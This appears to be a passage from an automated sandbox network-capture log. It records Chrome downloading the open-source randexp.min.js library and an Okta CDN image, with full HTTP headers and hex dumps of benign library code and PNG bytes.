                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:56:00 UTC845INHTTP/1.1 200 OK
                                                                                                                                              Connection: close
                                                                                                                                              Content-Length: 10245
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                                                                                                                              ETag: "0x8D9B9A009499A1E"
                                                                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                              x-ms-request-id: d91f6eaf-e01e-0032-2f18-13e122000000
                                                                                                                                              x-ms-version: 2023-11-03
                                                                                                                                              x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                                                                                                                              x-ms-blob-content-md5: bCCivoupALwKcRiJOisQcg==
                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                              x-ms-lease-state: available
                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                              Content-Disposition: attachment; filename=randexp.min.js
                                                                                                                                              x-ms-server-encrypted: true
                                                                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                                                                              Fastly-Restarts: 1
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:00 GMT
                                                                                                                                              Age: 4227
                                                                                                                                              X-Served-By: cache-iad-kiad7000045-IAD, cache-dfw-kdal2120040-DFW
                                                                                                                                              X-Cache: HIT, HIT
                                                                                                                                              X-Cache-Hits: 2, 1
                                                                                                                                              X-Timer: S1730908560.990170,VS0,VE1
                                                                                                                                              2024-11-06 15:56:00 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                                                                                                                              Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                                                                                                                              2024-11-06 15:56:00 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
                                                                                                                                              Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                                                                                                                              2024-11-06 15:56:00 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                                                                                                                              Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                                                                                                                              2024-11-06 15:56:00 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                                                                                                                              Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
                                                                                                                                              2024-11-06 15:56:00 UTC1378INData Raw: 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 44 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 22 3a 68 2e 70 75 73 68 28 61 2e 77 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 53 22 3a 68 2e 70 75 73 68 28 61 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 2f 5c 64 2f 2e 74 65 73 74 28 6e 29 3f 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 46 45 52 45 4e 43 45 2c 76 61 6c 75 65 3a 70 61 72 73 65 49 6e 74 28 6e 2c 31 30 29 7d 29 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 5e 22 3a 68 2e 70 75 73 68 28 73 2e
                                                                                                                                              Data Ascii: );break;case"D":h.push(a.notInts());break;case"s":h.push(a.whitespace());break;case"S":h.push(a.notWhitespace());break;default:/\d/.test(n)?h.push({type:o.REFERENCE,value:parseInt(n,10)}):h.push({type:o.CHAR,value:n.charCodeAt(0)})}break;case"^":h.push(s.
                                                                                                                                              2024-11-06 15:56:00 UTC1378INData Raw: 68 26 26 63 28 69 29 2c 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 52 45 50 45 54 49 54 49 4f 4e 2c 6d 69 6e 3a 30 2c 6d 61 78 3a 31 2f 30 2c 76 61 6c 75 65 3a 68 2e 70 6f 70 28 29 7d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 68 2e 70 75 73 68 28 7b 74 79 70 65 3a 6f 2e 43 48 41 52 2c 76 61 6c 75 65 3a 6e 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 7d 72 65 74 75 72 6e 20 30 21 3d 3d 6c 2e 6c 65 6e 67 74 68 26 26 72 2e 65 72 72 6f 72 28 65 2c 22 55 6e 74 65 72 6d 69 6e 61 74 65 64 20 67 72 6f 75 70 22 29 2c 75 7d 2c 74 2e 65 78 70 6f 72 74 73 2e 74 79 70 65 73 3d 6f 7d 2c 7b 22 2e 2f 70 6f 73 69 74 69 6f 6e 73 22 3a 34 2c 22 2e 2f 73 65 74 73 22 3a 35 2c 22 2e 2f 74 79 70 65 73 22 3a 36 2c 22 2e 2f 75 74 69 6c 22 3a 37 7d 5d 2c 34 3a 5b 66 75
                                                                                                                                              Data Ascii: h&&c(i),h.push({type:o.REPETITION,min:0,max:1/0,value:h.pop()});break;default:h.push({type:o.CHAR,value:n.charCodeAt(0)})}return 0!==l.length&&r.error(e,"Unterminated group"),u},t.exports.types=o},{"./positions":4,"./sets":5,"./types":6,"./util":7}],4:[fu
                                                                                                                                              2024-11-06 15:56:00 UTC1378INData Raw: 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 36 35 32 37 39 7d 5d 7d 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 5b 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 30 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 31 33 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 32 7d 2c 7b 74 79 70 65 3a 72 2e 43 48 41 52 2c 76 61 6c 75 65 3a 38 32 33 33 7d 5d 7d 3b 6e 2e 77 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 31 7d 7d 2c 6e 2e 6e 6f 74 57 6f 72 64 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 74 79 70 65 3a 72 2e 53 45 54 2c 73 65 74 3a 61 28 29 2c 6e 6f 74 3a 21 30 7d 7d 2c 6e 2e 69 6e
                                                                                                                                              Data Ascii: r.CHAR,value:65279}]},i=function(){return[{type:r.CHAR,value:10},{type:r.CHAR,value:13},{type:r.CHAR,value:8232},{type:r.CHAR,value:8233}]};n.words=function(){return{type:r.SET,set:a(),not:!1}},n.notWords=function(){return{type:r.SET,set:a(),not:!0}},n.in
                                                                                                                                              2024-11-06 15:56:00 UTC599INData Raw: 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 34 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 6f 72 64 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 35 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 49 6e 74 73 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 36 5d 29 69 2e 70 75 73 68 28 6f 2e 6e 6f 74 57 68 69 74 65 73 70 61 63 65 28 29 29 3b 65 6c 73 65 20 69 66 28 61 5b 37 5d 29 69 2e 70 75 73 68 28 7b 74 79 70 65 3a 72 2e 52 41 4e 47 45 2c 66 72 6f 6d 3a 28 61 5b 38 5d 7c 7c 61 5b 39 5d 29 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2c 74 6f 3a 61 5b 31 30 5d 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 7d 29 3b 65 6c 73 65 7b 69 66 28 21 28 73 3d 61 5b 31 32 5d 29 29 72 65 74 75 72 6e 5b 69 2c 75 2e 6c 61 73 74 49 6e 64 65 78 5d 3b 69 2e 70 75
                                                                                                                                              Data Ascii: hitespace());else if(a[4])i.push(o.notWords());else if(a[5])i.push(o.notInts());else if(a[6])i.push(o.notWhitespace());else if(a[7])i.push({type:r.RANGE,from:(a[8]||a[9]).charCodeAt(0),to:a[10].charCodeAt(0)});else{if(!(s=a[12]))return[i,u.lastIndex];i.pu


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              66192.168.2.184983013.33.187.964432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:00 UTC374OUTGET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1
                                                                                                                                              Host: ok4static.oktacdn.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:56:00 UTC684INHTTP/1.1 200 OK
                                                                                                                                              Content-Type: image/png
                                                                                                                                              Content-Length: 10796
                                                                                                                                              Connection: close
                                                                                                                                              Date: Mon, 04 Nov 2024 07:34:47 GMT
                                                                                                                                              Server: nginx
                                                                                                                                              Last-Modified: Tue, 23 Feb 2021 04:20:08 GMT
                                                                                                                                              ETag: "12bdacc832185d0367ecc23fd24c86ce"
                                                                                                                                              Expires: Tue, 04 Nov 2025 07:34:47 GMT
                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                              Cache-Control: public,max-age=31536000,s-maxage=1814400
                                                                                                                                              Strict-Transport-Security: max-age=315360000; includeSubDomains
                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              X-Cache: Hit from cloudfront
                                                                                                                                              Via: 1.1 840e16b680c94fee8c48b15e01dda782.cloudfront.net (CloudFront)
                                                                                                                                              X-Amz-Cf-Pop: FRA60-P9
                                                                                                                                              X-Amz-Cf-Id: 41ZQx9blLSL1eztg3_JRBjmZ3U8TMfl0z0DRbTiTRUkF3iTQdx4qGg==
                                                                                                                                              Age: 202873
                                                                                                                                              2024-11-06 15:56:00 UTC9594INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 a4 00 00 00 5e 08 06 00 00 00 6c 32 60 fe 00 00 29 f3 49 44 41 54 78 da ed 7d 09 9c 1c 55 9d ff a0 8b 20 77 a6 eb bd 1a 42 10 10 50 24 8a 48 76 09 c9 74 d5 ab ea 09 91 b8 a0 78 84 45 41 40 04 51 60 81 45 14 d0 15 02 88 c8 2d ec 8a 9c 22 97 28 e7 9f e5 58 60 89 11 44 2e c3 11 c8 35 5d 5d 55 7d cd 95 c9 9d 90 83 24 33 ff df af aa 26 e9 cc bc d7 67 75 4f 77 cf fb 7d 3e ef 13 98 99 ae 7e f5 8e df f7 77 ff 5a 5a 9a 84 12 7a eb be 96 d6 46 5a 24 49 92 24 49 92 a4 d1 a0 b8 4e fe b3 c7 a4 9d 09 9d ac 74 74 b2 24 65 90 c5 09 4d f9 c5 bc e9 ea ae 72 75 24 49 92 24 49 52 d5 68 81 41 76 4b 30 c5 74 19 b9 77 79 87 3a 98 31 e8 a0 a5 93 c1 44 ce 48 c3 cf d6 4c 53 07 01 98 92 69 46 7e b6 58 8f c4 e0 73 6d 72 f5 24
                                                                                                                                              Data Ascii: PNGIHDR^l2`)IDATx}U wBP$HvtxEA@Q`E-"(X`D.5]]U}$3&guOw}>~wZZzFZ$I$INtt$eMru$I$IRhAvK0twy:1DHLSiF~Xsmr$
                                                                                                                                              2024-11-06 15:56:00 UTC1202INData Raw: 6c 0b 68 b0 eb d0 ec 96 af 0a 75 49 60 6e 28 c7 02 b3 5f ea 32 ba 1e 99 8d 5d c4 39 4a e0 5c 19 59 9f 62 64 75 5c a3 d7 0f d6 28 10 0a 19 7c 5c 27 cf f6 c6 e8 1a 2f e9 14 d6 c3 29 ee cc e3 f8 28 03 67 1e f8 4a 12 d6 6f 46 2d cf 3c 86 ab 83 e6 d8 99 82 7d c6 35 2e 30 e7 cd de df e9 4a a6 33 24 cd 0d db a9 c3 ba fd 0f 08 68 ab 41 8b 2d 6a dd 72 f7 3a 89 e7 13 bb 12 54 62 c6 f7 aa c3 6a ca 99 59 43 7d ba 27 a6 3e 0d 8c e0 1a 5b 57 be e3 46 23 93 ab 29 15 84 76 f8 98 fa 03 09 48 45 48 ba 53 26 7c d2 31 31 9a 8e 1e df 1b 53 cf 74 74 7a 03 8c fb 50 32 83 03 f5 38 86 f0 c3 be ff 2e 6d a8 3f ef ed 50 4f 8c 63 de 8a 4e 0e 6e 91 54 37 b4 e8 c8 7d 22 16 08 18 59 83 9c 9a 34 c9 d5 36 a3 7f c4 7a 78 c1 f8 73 d2 a0 d7 f7 99 f4 14 4b a7 d3 d3 47 57 a7 90 26 32 cd 4e 2d
                                                                                                                                              Data Ascii: lhuI`n(_2]9J\Ybdu\(|\'/)(gJoF-<}5.0J3$hA-jr:TbjYC}'>[WF#)vHEHS&|11SttzP28.m?POcNnT7}"Y46zxsKGW&2N-


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              67192.168.2.1849837185.199.111.1334432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:00 UTC824OUTGET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241106%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241106T155559Z&X-Amz-Expires=300&X-Amz-Signature=c35f79085d4530d97feeeba7c17e7b0be2f621881773f7b10a56f304666d5b45&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                                                                              Host: objects.githubusercontent.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:56:01 UTC845INHTTP/1.1 200 OK
                                                                                                                                              Connection: close
                                                                                                                                              Content-Length: 10245
                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                              Last-Modified: Tue, 07 Dec 2021 16:38:45 GMT
                                                                                                                                              ETag: "0x8D9B9A009499A1E"
                                                                                                                                              Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                              x-ms-request-id: d91f6eaf-e01e-0032-2f18-13e122000000
                                                                                                                                              x-ms-version: 2023-11-03
                                                                                                                                              x-ms-creation-time: Tue, 17 Aug 2021 14:57:31 GMT
                                                                                                                                              x-ms-blob-content-md5: bCCivoupALwKcRiJOisQcg==
                                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                                              x-ms-lease-state: available
                                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                                              Content-Disposition: attachment; filename=randexp.min.js
                                                                                                                                              x-ms-server-encrypted: true
                                                                                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                                                                                              Fastly-Restarts: 1
                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:01 GMT
                                                                                                                                              Age: 4228
                                                                                                                                              X-Served-By: cache-iad-kiad7000045-IAD, cache-dfw-kdfw8210131-DFW
                                                                                                                                              X-Cache: HIT, HIT
                                                                                                                                              X-Cache-Hits: 2, 1
                                                                                                                                              X-Timer: S1730908561.898865,VS0,VE1
                                                                                                                                              2024-11-06 15:56:01 UTC1378INData Raw: 2f 2f 0a 2f 2f 20 72 61 6e 64 65 78 70 20 76 30 2e 34 2e 33 0a 2f 2f 20 43 72 65 61 74 65 20 72 61 6e 64 6f 6d 20 73 74 72 69 6e 67 73 20 74 68 61 74 20 6d 61 74 63 68 20 61 20 67 69 76 65 6e 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 2e 0a 2f 2f 0a 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 32 30 31 36 20 62 79 20 52 6f 6c 79 20 46 65 6e 74 61 6e 65 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 29 0a 2f 2f 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 2f 2f 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 65 6e 74 2f 72 61 6e 64 65 78 70 2e 6a 73 2f 72 61 77 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 20 0a 2f 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 52 61 6e 64 45 78 70 22
                                                                                                                                              Data Ascii: //// randexp v0.4.3// Create random strings that match a given regular expression.//// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent)// MIT License// http://github.com/fent/randexp.js/raw/master/LICENSE //!function(){var e="RandExp"
                                                                                                                                              2024-11-06 15:56:01 UTC1378INData Raw: 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 72 61 6e 64 49 6e 74 26 26 28 65 2e 72 61 6e 64 49 6e 74 3d 74 2e 72 61 6e 64 49 6e 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 76 61 72 20 6e 2c 69 2c 70 2c 68 2c 63 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 20 6c 2e 52 4f 4f 54 3a 63 61 73 65 20 6c 2e 47 52 4f 55 50 3a 69 66 28 65 2e 66 6f 6c 6c 6f 77 65 64 42 79 7c 7c 65 2e 6e 6f 74 46 6f 6c 6c 6f 77 65 64 42 79 29 72 65 74 75 72 6e 22 22 3b 66 6f 72 28 65 2e 72 65 6d 65 6d 62 65 72 26 26 76 6f 69 64 20 30 3d 3d 3d 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 26 26 28 65 2e 67 72 6f 75 70 4e 75 6d 62 65 72 3d 74 2e 70 75 73 68 28 6e 75 6c 6c 29 2d 31 29 2c 6e 3d 65 2e 6f 70 74 69 6f 6e 73 3f 61 2e 63 61 6c 6c
                                                                                                                                              Data Ascii: ),"function"==typeof t.randInt&&(e.randInt=t.randInt)}function u(e,t){var n,i,p,h,c;switch(e.type){case l.ROOT:case l.GROUP:if(e.followedBy||e.notFollowedBy)return"";for(e.remember&&void 0===e.groupNumber&&(e.groupNumber=t.push(null)-1),n=e.options?a.call
                                                                                                                                              2024-11-06 15:56:01 UTC1378INData Raw: 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 2e 72 61 6e 64 65 78 70 28 74 68 69 73 29 7d 7d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 66 61 75 6c 74 52 61 6e 67 65 3d 6e 65 77 20 68 28 33 32 2c 31 32 36 29 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 61 6e 64 49 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2b 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 28 31 2b 74 2d 65 29 29 7d 7d 2c 7b 22 64 69 73 63 6f 6e 74 69 6e 75 6f 75 73 2d 72 61 6e 67 65 22 3a 32 2c 72 65 74 3a 33 7d 5d 2c 32 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 74 68 69 73 2e 6c 6f 77 3d 65 2c 74 68 69 73 2e 68 69 67 68 3d 74 2c 74 68 69 73 2e 6c 65
                                                                                                                                              Data Ascii: en=function(){return c.randexp(this)}},c.prototype.defaultRange=new h(32,126),c.prototype.randInt=function(e,t){return e+Math.floor(Math.random()*(1+t-e))}},{"discontinuous-range":2,ret:3}],2:[function(e,t,n){function r(e,t){this.low=e,this.high=t,this.le
                                                                                                                                              2024-11-06 15:56:01 UTC1378INData Raw: 2e 6c 65 6e 67 74 68 3b 29 74 2e 70 75 73 68 28 73 2e 72 61 6e 67 65 73 5b 6e 5d 2e 63 6c 6f 6e 65 28 29 29 2c 6e 2b 2b 3b 73 2e 72 61 6e 67 65 73 3d 74 2c 61 28 73 29 7d 76 61 72 20 73 3d 74 68 69 73 3b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 3f 65 2e 72 61 6e 67 65 73 2e 66 6f 72 45 61 63 68 28 6e 29 3a 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 3f 6e 28 65 29 3a 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 65 29 2c 6e 28 6e 65 77 20 72 28 65 2c 74 29 29 29 2c 74 68 69 73 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 75 62 74 72 61 63 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 73 2e 72 61 6e 67 65 73 2e 6c 65 6e 67 74 68 26 26
                                                                                                                                              Data Ascii: .length;)t.push(s.ranges[n].clone()),n++;s.ranges=t,a(s)}var s=this;return e instanceof o?e.ranges.forEach(n):e instanceof r?n(e):(void 0===t&&(t=e),n(new r(e,t))),this},o.prototype.subtract=function(e,t){function n(e){for(var t=[],n=0;n<s.ranges.length&&
